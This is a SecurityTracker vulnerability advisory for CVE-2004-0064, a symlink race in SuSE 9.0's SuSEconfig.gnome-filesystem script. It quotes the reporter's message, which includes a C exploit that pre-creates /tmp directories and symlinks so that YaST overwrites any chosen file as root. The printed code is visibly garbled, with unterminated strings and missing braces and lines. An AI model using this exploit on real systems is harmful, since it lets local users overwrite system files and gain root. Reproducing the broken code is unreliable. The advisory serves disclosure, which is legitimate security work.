Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   Application (Generic)  >   SuSEconfig.gnome-filesystem Vendors:   SuSE
SuSEconfig.gnome-filesystem Temporary File Symlink Flaw Lets Local Users Overwrite Files With Root Privileges
SecurityTracker Alert ID:  1008703
SecurityTracker URL:
CVE Reference:   CVE-2004-0064   (Links to External Site)
Updated:  Jan 20 2004
Original Entry Date:  Jan 13 2004
Impact:   Modification of system information, Root access via local system
Exploit Included:  Yes  

Description:   A vulnerability was reported in the SuSEconfig.gnome-filesystem YaST configuration script. A local user can overwrite arbitrary files on the system.

l0om from reported that the configuration script creates temporary files in an unsafe manner. A local user can create a symbolic link from a critical file on the system to a likely temporary file name (of the form '/tmp/tmp.SuSEconfig.gnome-filesystem.[RANDOM]'). Then, when a configuration change is made with the YaST tool, the script will be executed and the symlinked file will be overwritten with root privileges.

A demonstration exploit script is provided in the Source Message.

Impact:   A local user can overwrite arbitrary files on the system with root privileges to gain root privileges.
Solution:   No solution was available at the time of this entry.
Vendor URL: (Links to External Site)
Cause:   Access control error, State error
Underlying OS:  Linux (SuSE)
Underlying OS Comments:  9.0

Message History:   None.

 Source Message Contents

Subject:  SuSE linux 9.0 YaST config Skribt [exploit]

 Author: l0om <>  
 Date: 12.01.2004 
 SuSE 9.0 - YaST script SuSEconfig.gnome-filesystem  
 There is a symlink problem in the 
 scribt. a normal user can creat and overwrite every 
 on the system. This script gets executed after a 
configuration change by the  
setup tool YaST. So if you have installed gnome or 
parts of gnome check this out. 
 When this scribt gets executed by YaST after a  
 configuration change it does the following:  
 mkdir $TEMP  
 touch $TEMP/list  
 echo >$TEMP/found  
 the env variable $RANDOM includes a random number. 
in my tests  
 this number goes up from 1 to 33000. But also if it 
goes up to  
 65535 it is still vul. to a symlink attack. this is 
nearly as  
 bad as the symlink problem which has been found on 
SuSE 8.2.  
 On 8.2 a SuSEconf scribt has created a link with the 
$$ at the  
 file end.  
 I have used a little exploit written in C which 
creats the  
 directory "/tmp/tmp.SuSEconfig.gnome-filesystem.1" 
up to  
 33000. in every directory i have created a symlink 
to a file  
 which i want to creat or to overwrite. as the 
filename i have  
 taken the $TEMP/found and let it point to some file. 
in my test i  
 have taken the /etc/nologin- and hey- it has worked!  
 have phun!  
 #include <stdio.h>  
 #include <unistd.h>  
 #include <string.h>  
 #define PATH "/tmp/tmp.SuSEconfig.gnome-filesystem."  
 #define START 1  
 #define END 33000  
 int main(int argc, char **argv)  
 int i;  
 char buf[150];  
 printf("\tSuSE 9.0 YaST script 
SuSEconfig.gnome-filesystem exploit\n");  
 printf("\tdiscovered and written by l0om 
 printf("\t WWW.EXCLUDED.ORG\n\n");  
 if(argc != 2) {  
 printf("usage: %s <destination-file>\n",argv[0]);  
 printf("### hit enter to create or overwrite file %
s: ",argv[1]); fflush(stdout);  
 read(1, buf, 1); fflush(stdin);  
 for(i = START; i < END; i++) {  
 snprintf(buf, sizeof(buf),"%s%d",PATH,i);  
 if(mkdir(buf,00777) == -1) {  
 fprintf(stderr, "cannot creat directory [Nr.%d]
 strcat(buf, "/found");  
 if(symlink(argv[1], buf) == -1) {  
 fprintf(stderr, "cannot creat symlink from %s to %s 
 printf("next time the SuSE.gnome-filesystem script 
gets executed\n");  
 printf("we will create or overwrite file %s
 }  /* i cant wait for the new gobbles comic!! */ 


Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, LLC